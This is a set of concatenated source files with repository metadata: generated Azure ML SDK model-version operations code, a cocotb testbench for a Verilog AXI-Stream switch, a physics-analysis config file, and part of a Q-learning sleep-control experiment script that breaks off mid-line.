name: str :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param registry_name: Name of Azure Machine Learning registry. :type registry_name: str :param skiptoken: Continuation token for pagination. :type skiptoken: str :param order_by: Ordering of list. :type order_by: str :param top: Maximum number of records to return. :type top: int :param version: Version identifier. :type version: str :param description: Model description. :type description: str :param tags: Comma-separated list of tag names (and optionally values). Example: tag1,tag2=value2. :type tags: str :param properties: Comma-separated list of property names (and optionally values). Example: prop1,prop2=value2. :type properties: str :param list_view_type: View type for including/excluding (for example) archived entities. :type list_view_type: str or ~azure.mgmt.machinelearningservices.models.ListViewType :keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note that overriding this default value may result in unsupported behavior. :paramtype api_version: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ModelVersionResourceArmPaginatedResult or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.machinelearningservices.models.ModelVersionResourceArmPaginatedResult] :raises: ~azure.core.exceptions.HttpResponseError """ api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionResourceArmPaginatedResult"] error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError} error_map.update(kwargs.pop("error_map", {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( name=name, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, skiptoken=skiptoken, order_by=order_by, top=top, version=version, description=description, tags=tags, properties=properties, list_view_type=list_view_type, template_url=self.list.metadata["url"], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( name=name, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, skiptoken=skiptoken, order_by=order_by, top=top, version=version, description=description, tags=tags, properties=properties, list_view_type=list_view_type, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("ModelVersionResourceArmPaginatedResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return ItemPaged(get_next, extract_data) list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions"} # type: ignore @distributed_trace def delete( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> None """Delete version. Delete version. :param name: Container name. :type name: str :param version: Version identifier. :type version: str :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param registry_name: Name of Azure Machine Learning registry. :type registry_name: str :keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note that overriding this default value may result in unsupported behavior. :paramtype api_version: str :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop("cls", None) # type: ClsType[None] error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError} error_map.update(kwargs.pop("error_map", {})) api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str request = build_delete_request( name=name, version=version, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, template_url=self.delete.metadata["url"], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200, 204]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) if cls: return cls(pipeline_response, None, {}) delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore @distributed_trace def get( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str **kwargs # type: Any ): # type: (...) -> "_models.ModelVersionData" """Get version. Get version. :param name: Container name. This is case-sensitive. :type name: str :param version: Version identifier. This is case-sensitive. :type version: str :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param registry_name: Name of Azure Machine Learning registry. :type registry_name: str :keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note that overriding this default value may result in unsupported behavior. :paramtype api_version: str :keyword callable cls: A custom type or function that will be passed the direct response :return: ModelVersionData, or the result of cls(response) :rtype: ~azure.mgmt.machinelearningservices.models.ModelVersionData :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionData"] error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError} error_map.update(kwargs.pop("error_map", {})) api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str request = build_get_request( name=name, version=version, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, template_url=self.get.metadata["url"], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize("ModelVersionData", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore def _create_or_update_initial( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str body, # type: "_models.ModelVersionData" **kwargs # type: Any ): # type: (...) -> None cls = kwargs.pop("cls", None) # type: ClsType[None] error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError} error_map.update(kwargs.pop("error_map", {})) api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop("content_type", "application/json") # type: Optional[str] _json = self._serialize.body(body, "ModelVersionData") request = build_create_or_update_request_initial( name=name, version=version, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, content_type=content_type, json=_json, template_url=self._create_or_update_initial.metadata["url"], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [202]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) response_headers = {} response_headers["x-ms-async-operation-timeout"] = self._deserialize( "duration", response.headers.get("x-ms-async-operation-timeout") ) response_headers["Location"] = self._deserialize("str", response.headers.get("Location")) response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After")) if cls: return cls(pipeline_response, None, response_headers) _create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore @distributed_trace def begin_create_or_update( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str body, # type: "_models.ModelVersionData" **kwargs # type: Any ): # type: (...) -> LROPoller[None] """Create or update version. Create or update version. :param name: Container name. :type name: str :param version: Version identifier. :type version: str :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param registry_name: Name of Azure Machine Learning registry. :type registry_name: str :param body: Version entity to create or update. :type body: ~azure.mgmt.machinelearningservices.models.ModelVersionData :keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note that overriding this default value may result in unsupported behavior. :paramtype api_version: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either None or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[None] :raises: ~azure.core.exceptions.HttpResponseError """ api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop("content_type", "application/json") # type: Optional[str] polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod] cls = kwargs.pop("cls", None) # type: ClsType[None] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._create_or_update_initial( name=name, version=version, resource_group_name=resource_group_name, registry_name=registry_name, body=body, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): if cls: return cls(pipeline_response, None, {}) if polling is True: polling_method = ARMPolling(lro_delay, **kwargs) elif polling is False: polling_method = NoPolling() else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) else: return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore def _package_initial( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str body, # type: "_models.PackageRequest" **kwargs # type: Any ): # type: (...) -> Optional["_models.PackageResponse"] cls = kwargs.pop("cls", None) # type: ClsType[Optional["_models.PackageResponse"]] error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError} error_map.update(kwargs.pop("error_map", {})) api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop("content_type", "application/json") # type: Optional[str] _json = self._serialize.body(body, "PackageRequest") request = build_package_request_initial( name=name, version=version, subscription_id=self._config.subscription_id, resource_group_name=resource_group_name, registry_name=registry_name, api_version=api_version, content_type=content_type, json=_json, template_url=self._package_initial.metadata["url"], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200, 202]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = None response_headers = {} if response.status_code == 200: deserialized = self._deserialize("PackageResponse", pipeline_response) if response.status_code == 202: response_headers["Location"] = self._deserialize("str", response.headers.get("Location")) response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After")) if cls: return cls(pipeline_response, deserialized, response_headers) return deserialized _package_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore @distributed_trace def begin_package( self, name, # type: str version, # type: str resource_group_name, # type: str registry_name, # type: str body, # type: "_models.PackageRequest" **kwargs # type: Any ): # type: (...) -> LROPoller["_models.PackageResponse"] """Model Version Package operation. Model Version Package operation. :param name: Container name. This is case-sensitive. :type name: str :param version: Version identifier. This is case-sensitive. :type version: str :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param registry_name: Name of Azure Machine Learning registry. :type registry_name: str :param body: Package operation request body. :type body: ~azure.mgmt.machinelearningservices.models.PackageRequest :keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note that overriding this default value may result in unsupported behavior. :paramtype api_version: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either PackageResponse or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.machinelearningservices.models.PackageResponse] :raises: ~azure.core.exceptions.HttpResponseError """ api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str content_type = kwargs.pop("content_type", "application/json") # type: Optional[str] polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod] cls = kwargs.pop("cls", None) # type: ClsType["_models.PackageResponse"] lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token = kwargs.pop("continuation_token", None) # type: Optional[str] if cont_token is None: raw_result = self._package_initial( name=name, version=version, resource_group_name=resource_group_name, registry_name=registry_name, body=body, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): response = pipeline_response.http_response deserialized = self._deserialize("PackageResponse", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized if polling is True: polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs) elif polling is False: polling_method = NoPolling() else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) else: return LROPoller(self._client, raw_result, get_long_running_output, polling_method) begin_package.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore
5770ffe7fdec00cd3c57add6a4c9a57c867b7d78
21445827919e574e6150117f9520c5326251c654
/lib/axis/tb/axis_switch/test_axis_switch.py
7132a00db6c2daf5401d45cfbca3c819a102aaa4
[ "MIT" ]
permissive
nyhuang/verilog-ethernet
0af9b2333f673b1256a26868ce60e946d98be940
cf832f581cfc43d6eb60af6ec68517f446ed9158
refs/heads/master
2023-06-26T04:13:22.530195
2021-06-28T08:34:34
2021-06-28T08:34:34
262,713,491
1
0
MIT
2020-05-10T04:43:45
2020-05-10T04:43:44
null
UTF-8
Python
false
false
10,556
py
#!/usr/bin/env python """ Copyright (c) 2021 Alex Forencich Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import logging import os import random import subprocess import cocotb_test.simulator import pytest import cocotb from cocotb.clock import Clock from cocotb.triggers import RisingEdge, Event from cocotb.regression import TestFactory from cocotbext.axi import AxiStreamBus, AxiStreamFrame, AxiStreamSource, AxiStreamSink class TB(object): def __init__(self, dut): self.dut = dut s_count = len(dut.axis_switch_inst.s_axis_tvalid) m_count = len(dut.axis_switch_inst.m_axis_tvalid) self.log = logging.getLogger("cocotb.tb") self.log.setLevel(logging.DEBUG) cocotb.fork(Clock(dut.clk, 10, units="ns").start()) self.source = [AxiStreamSource(AxiStreamBus.from_prefix(dut, f"s{k:02d}_axis"), dut.clk, dut.rst) for k in range(s_count)] self.sink = [AxiStreamSink(AxiStreamBus.from_prefix(dut, f"m{k:02d}_axis"), dut.clk, dut.rst) for k in range(m_count)] def set_idle_generator(self, generator=None): if generator: for source in self.source: source.set_pause_generator(generator()) def set_backpressure_generator(self, generator=None): if generator: for sink in self.sink: sink.set_pause_generator(generator()) async def reset(self): self.dut.rst.setimmediatevalue(0) await RisingEdge(self.dut.clk) await RisingEdge(self.dut.clk) self.dut.rst <= 1 await RisingEdge(self.dut.clk) await RisingEdge(self.dut.clk) self.dut.rst <= 0 await RisingEdge(self.dut.clk) await RisingEdge(self.dut.clk) async def run_test(dut, payload_lengths=None, payload_data=None, idle_inserter=None, backpressure_inserter=None, s=0, m=0): tb = TB(dut) id_count = 2**len(tb.source[s].bus.tid) cur_id = 1 await tb.reset() tb.set_idle_generator(idle_inserter) tb.set_backpressure_generator(backpressure_inserter) test_frames = [] for test_data in [payload_data(x) for x in payload_lengths()]: test_frame = AxiStreamFrame(test_data) test_frame.tid = cur_id test_frame.tdest = m test_frames.append(test_frame) await tb.source[s].send(test_frame) cur_id = (cur_id + 1) % id_count for test_frame in test_frames: rx_frame = await tb.sink[m].recv() assert rx_frame.tdata == test_frame.tdata assert rx_frame.tid == test_frame.tid assert rx_frame.tdest == test_frame.tdest assert not rx_frame.tuser assert all(s.empty() for s in tb.sink) await RisingEdge(dut.clk) await RisingEdge(dut.clk) async def run_test_tuser_assert(dut, s=0, m=0): tb = TB(dut) await tb.reset() test_data = bytearray(itertools.islice(itertools.cycle(range(256)), 32)) test_frame = AxiStreamFrame(test_data, tuser=1, tdest=m) await tb.source[s].send(test_frame) rx_frame = await tb.sink[m].recv() assert rx_frame.tdata == test_data assert rx_frame.tuser assert all(s.empty() for s in tb.sink) await RisingEdge(dut.clk) await RisingEdge(dut.clk) async def run_arb_test(dut): tb = TB(dut) byte_lanes = tb.source[0].byte_lanes id_count = 2**len(tb.source[0].bus.tid) cur_id = 1 await tb.reset() test_frames = [] length = byte_lanes*16 test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length)) for k in range(5): test_frame = AxiStreamFrame(test_data, tx_complete=Event()) test_frame.tid = cur_id test_frame.tdest = 0 src_ind = 0 if k == 0: src_ind = 0 elif k == 4: await test_frames[1].tx_complete.wait() for j in range(8): await RisingEdge(dut.clk) src_ind = 0 else: src_ind = 1 test_frames.append(test_frame) await tb.source[src_ind].send(test_frame) cur_id = (cur_id + 1) % id_count for k in [0, 1, 2, 4, 3]: test_frame = test_frames[k] rx_frame = await tb.sink[0].recv() assert rx_frame.tdata == test_frame.tdata assert rx_frame.tid == test_frame.tid assert rx_frame.tdest == test_frame.tdest assert not rx_frame.tuser assert all(s.empty() for s in tb.sink) await RisingEdge(dut.clk) await RisingEdge(dut.clk) async def run_stress_test(dut, idle_inserter=None, backpressure_inserter=None): tb = TB(dut) byte_lanes = tb.source[0].byte_lanes id_count = 2**len(tb.source[0].bus.tid) cur_id = 1 await tb.reset() tb.set_idle_generator(idle_inserter) tb.set_backpressure_generator(backpressure_inserter) test_frames = [[list() for y in tb.sink] for x in tb.source] for p in range(len(tb.source)): for k in range(128): length = random.randint(1, byte_lanes*16) test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length)) test_frame = AxiStreamFrame(test_data) test_frame.tid = cur_id test_frame.tdest = random.randrange(len(tb.sink)) test_frames[p][test_frame.tdest].append(test_frame) await tb.source[p].send(test_frame) cur_id = (cur_id + 1) % id_count for lst in test_frames: while any(lst): rx_frame = await tb.sink[[x for x in lst if x][0][0].tdest].recv() test_frame = None for lst_a in test_frames: for lst_b in lst_a: if lst_b and lst_b[0].tid == rx_frame.tid: test_frame = lst_b.pop(0) break assert test_frame is not None assert rx_frame.tdata == test_frame.tdata assert rx_frame.tid == test_frame.tid assert rx_frame.tdest == test_frame.tdest assert not rx_frame.tuser assert all(s.empty() for s in tb.sink) await RisingEdge(dut.clk) await RisingEdge(dut.clk) def cycle_pause(): return itertools.cycle([1, 1, 1, 0]) def size_list(): data_width = len(cocotb.top.s00_axis_tdata) byte_width = data_width // 8 return list(range(1, byte_width*4+1))+[512]+[1]*64 def incrementing_payload(length): return bytearray(itertools.islice(itertools.cycle(range(256)), length)) if cocotb.SIM_NAME: s_count = len(cocotb.top.axis_switch_inst.s_axis_tvalid) m_count = len(cocotb.top.axis_switch_inst.m_axis_tvalid) factory = TestFactory(run_test) factory.add_option("payload_lengths", [size_list]) factory.add_option("payload_data", [incrementing_payload]) factory.add_option("idle_inserter", [None, cycle_pause]) factory.add_option("backpressure_inserter", [None, cycle_pause]) factory.add_option("s", range(min(s_count, 2))) factory.add_option("m", range(min(m_count, 2))) factory.generate_tests() for test in [run_test_tuser_assert]: factory = TestFactory(test) factory.add_option("s", range(min(s_count, 2))) factory.add_option("m", range(min(m_count, 2))) factory.generate_tests() if s_count > 1: factory = TestFactory(run_arb_test) factory.generate_tests() factory = TestFactory(run_stress_test) factory.add_option("idle_inserter", [None, cycle_pause]) factory.add_option("backpressure_inserter", [None, cycle_pause]) factory.generate_tests() # cocotb-test tests_dir = os.path.dirname(__file__) rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl')) @pytest.mark.parametrize("data_width", [8, 16, 32]) @pytest.mark.parametrize("m_count", [1, 4]) @pytest.mark.parametrize("s_count", [1, 4]) def test_axis_switch(request, s_count, m_count, data_width): dut = "axis_switch" wrapper = f"{dut}_wrap_{s_count}x{m_count}" module = os.path.splitext(os.path.basename(__file__))[0] toplevel = wrapper # generate wrapper wrapper_file = os.path.join(tests_dir, f"{wrapper}.v") if not os.path.exists(wrapper_file): subprocess.Popen( [os.path.join(rtl_dir, f"{dut}_wrap.py"), "-p", f"{s_count}", f"{m_count}"], cwd=tests_dir ).wait() verilog_sources = [ wrapper_file, os.path.join(rtl_dir, f"{dut}.v"), os.path.join(rtl_dir, "axis_register.v"), os.path.join(rtl_dir, "arbiter.v"), os.path.join(rtl_dir, "priority_encoder.v"), ] parameters = {} parameters['S_COUNT'] = s_count parameters['M_COUNT'] = m_count parameters['DATA_WIDTH'] = data_width parameters['KEEP_ENABLE'] = int(parameters['DATA_WIDTH'] > 8) parameters['KEEP_WIDTH'] = parameters['DATA_WIDTH'] // 8 parameters['ID_ENABLE'] = 1 parameters['ID_WIDTH'] = 16 parameters['DEST_WIDTH'] = 8 parameters['USER_ENABLE'] = 1 parameters['USER_WIDTH'] = 1 parameters['S_REG_TYPE'] = 0 parameters['M_REG_TYPE'] = 2 parameters['ARB_TYPE_ROUND_ROBIN'] = 1 parameters['ARB_LSB_HIGH_PRIORITY'] = 1 extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()} sim_build = os.path.join(tests_dir, "sim_build", request.node.name.replace('[', '-').replace(']', '')) cocotb_test.simulator.run( python_search=[tests_dir], verilog_sources=verilog_sources, toplevel=toplevel, module=module, parameters=parameters, sim_build=sim_build, extra_env=extra_env, )
98f5a7d9ab4b3f578ce6948bda3f56af31438973
eb42558f56fdb41526cc31ac4ef3a6937bf39e96
/ConfigDefinitions/UserConfigs/SMHTT_2017_MCOnly_AntiIso_Configs_Deep/WConfig.py
c3c70830e40ca4f509cffad86bf361a53146d0bb
[]
no_license
samhiggie/Jesterworks
6906b042d3e200efb9bd10b70284ccd30661aa53
562e8cbb20d7e4b1d5b9bdba3715578cc66f097d
refs/heads/master
2020-09-11T19:35:59.770456
2019-11-16T12:37:35
2019-11-16T12:37:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
967
py
from ConfigDefinitions.JesterworksConfigurations import JesterworksConfiguration as Config from ConfigDefinitions.BranchAdditions.UserDefinedCollections.SMHTT_2017_MC_Data_Collection import MC_Data_Collection as BranchCollection from ConfigDefinitions.CuttingDefinitions.UserCutConfigs.SMHTT2017Cuts_MC_AntiIso_wDeep import SMHTT2017Cuts as CutConfig from ConfigDefinitions.EndActionDefinitions.UserConfigs.GrabHistograms import HistogramGrabber as HistogramGrabber DataConfig = Config() DataConfig.Path = "/data/ccaillol/smhmt2017_svfitted_12oct/" DataConfig.Files = ["W.root","W1.root","W2.root","W3.root","W4.root"] DataConfig.InputTreeName = "mutau_tree" DataConfig.SampleName = "W" DataConfig.OutputPath = "/data/aloeliger/SMHTT_Selected_2017_MCOnly_AntiIso_Deep/" DataConfig.OutputFile = "W.root" DataConfig.OutputTreeName = 'mt_Selected' DataConfig.BranchCollection = BranchCollection DataConfig.CutConfig = CutConfig DataConfig.EndAction = HistogramGrabber
109a0b28a419817d509d6d4ce27db19a8f90c3ad
235fcd12177715b51f26715befb7cb1909f27126
/sleep_control/experiments/arxiv/experiment_QNN_Jan31_2249_LSTM.py
ad1ee787afca6d41b7db4289cd35014ed9d60009
[]
no_license
xiaogaogaoxiao/dqn4wirelesscontrol
1d165977f01e263735865e2b6daeed51c4288b01
68c2c485e64cef260c0dcb3975a88af4fae97283
refs/heads/master
2020-06-16T17:05:45.038089
2017-02-10T07:30:12
2017-02-10T07:30:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,160
py
# System built-in modules import time from datetime import datetime import sys import os from multiprocessing import Pool project_dir = "../../" log_file_name = "msg_QNN_Jan31_2249_LSTM_{}.log".format(sys.argv[1]) sys.path.append(project_dir) sys_stdout = sys.stdout # Project dependency modules import pandas as pd pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment import lasagne # Project modules from sleep_control.traffic_emulator import TrafficEmulator from sleep_control.traffic_server import TrafficServer from sleep_control.controller import QController, DummyController, NController from sleep_control.integration import Emulation from sleep_control.env_models import SJTUModel from rl.qtable import QAgent from rl.qnn_theano import QAgentNN from rl.mixin import PhiMixin, DynaMixin # Composite classes class Phi_QAgentNN(PhiMixin, QAgentNN): def __init__(self, **kwargs): super(Phi_QAgentNN, self).__init__(**kwargs) class Dyna_QAgent(DynaMixin, QAgent): def __init__(self, **kwargs): super(Dyna_QAgent, self).__init__(**kwargs) class Dyna_QAgentNN(DynaMixin, QAgentNN): def __init__(self, **kwargs): super(Dyna_QAgentNN, self).__init__(**kwargs) # load from processed data session_df =pd.read_csv( filepath_or_buffer=project_dir+'/sleep_control/data/net_traffic_processed_dh3.dat', parse_dates=['startTime_datetime', 'endTime_datetime', 'interArrivalDuration_datetime'] ) # Parameters # |- Agent # |- QAgent actions = [(True, None), (False, 'serve_all')] gamma, alpha = 0.9, 0.9 # TD backup explore_strategy, epsilon = 'epsilon', 0.02 # exploration # |- QAgentNN # | - Phi phi_length = 15 dim_state = (1, phi_length, 3+2) range_state_slice = [(0, 10), (0, 10), (0, 10), (0, 1), (0, 1)] range_state = [[range_state_slice]*phi_length] # | - No Phi # phi_length = 0 # dim_state = (1, 1, 3) # range_state = ((((0, 10), (0, 10), (0, 10)),),) def f_build_net(input_var=None, input_shape=None, num_outputs=None): if input_shape is None or num_outputs is None: raise ValueError('State or Action dimension not given!') l_in = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var) d1, d2, d3, d4 = input_shape l_shp1 = lasagne.layers.ReshapeLayer(l_in, (-1, d3, d4)) l_lstm = lasagne.layers.LSTMLayer(l_shp1, num_units=500, grad_clipping=10, only_return_final=True, precompute_input=True) l_shp2 = lasagne.layers.ReshapeLayer(l_lstm, (-1, 500)) l_out = lasagne.layers.DenseLayer( l_shp2, num_units=num_outputs, nonlinearity=lasagne.nonlinearities.tanh) return l_out # | - Other params momentum, learning_rate = 0.9, 0.01 # SGD num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16 reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling # |- Env model model_type, traffic_window_size = 'IPP', 50 stride, n_iter, adjust_offset = 2, 3, 1e-22 eval_period, eval_len = 4, 100 n_belief_bins, max_queue_len = 100, 20 Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5 traffic_params = (model_type, traffic_window_size, stride, n_iter, adjust_offset, eval_period, eval_len, n_belief_bins) queue_params = (max_queue_len,) beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost reward_params = (Rs, Rw, Rf, Co, Cw, beta) # |- DynaQ num_sim = 5 # |- Env # |- Time start_time = pd.to_datetime("2014-10-15 09:40:00") total_time = pd.Timedelta(days=7) time_step = pd.Timedelta(seconds=2) backoff_epochs = num_buffer*memory_size+phi_length head_datetime = start_time - time_step*backoff_epochs tail_datetime = head_datetime + total_time TOTAL_EPOCHS = int(total_time/time_step) # |- Reward rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf} te = TrafficEmulator( session_df=session_df, time_step=time_step, head_datetime=head_datetime, tail_datetime=tail_datetime, rewarding=rewarding, verbose=2) ts = TrafficServer(cost=(Co, Cw), verbose=2) env_model = SJTUModel(traffic_params, queue_params, reward_params, 2) # agent = Dyna_QAgentNN( # env_model=env_model, num_sim=num_sim, agent = Phi_QAgentNN( phi_length=phi_length, dim_state=dim_state, range_state=range_state, f_build_net = f_build_net, batch_size=batch_size, learning_rate=learning_rate, momentum=momentum, reward_scaling=reward_scaling, reward_scaling_update=reward_scaling_update, rs_period=rs_period, update_period=update_period, freeze_period=freeze_period, memory_size=memory_size, num_buffer=num_buffer, # Below is QAgent params actions=actions, alpha=alpha, gamma=gamma, explore_strategy=explore_strategy, epsilon=epsilon, verbose=2) c = QController(agent=agent) emu = Emulation(te=te, ts=ts, c=c, beta=beta) # Heavyliftings t = time.time() sys.stdout = sys_stdout log_path = project_dir + '/sleep_control/experiments/log/' if 